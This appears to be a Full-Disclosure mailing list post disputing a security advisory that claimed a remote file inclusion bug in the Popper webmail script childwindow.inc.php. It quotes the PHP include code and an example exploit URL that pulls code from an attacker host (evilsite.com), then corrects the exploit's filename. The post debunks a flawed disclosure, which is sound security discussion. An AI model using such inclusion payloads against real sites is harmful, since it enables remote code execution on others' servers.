LSS.hr false positives.

["b0iler" <b0iler () r00thell org>]

> From your advisory @ http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-06-07:


> Popper is vulnerable to remote code inclusion bug in childwindow.inc.php script that can be
> abused to execute arbitrary code.
> Vulnerable code in childwindow.inc.php:
>
> -----
> ...
>    if(file_exists($form.".toolbar.inc.php")) {
>        include($form.".toolbar.inc.php");
>    }
> ?>

file_exists() only work on local files, not even with allow_url_fopen on does it work.  Even
if the file_exists() check was not there your discription of how to exploit it is incorrect:

> To exploit this vulnerability, attacker has to put script like test.form.inc.php on
> www.evilsite.com HTTP server, and call url like this:
> http://www.vulnsite.com/popper/childwindow.inc.php?form=http://evilsite.com/test

they would need to have the file test.toolbar.inc.php, not test.form.inc.php.  It's quite
obvious you did not even bother testing this before issuing the advisory.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/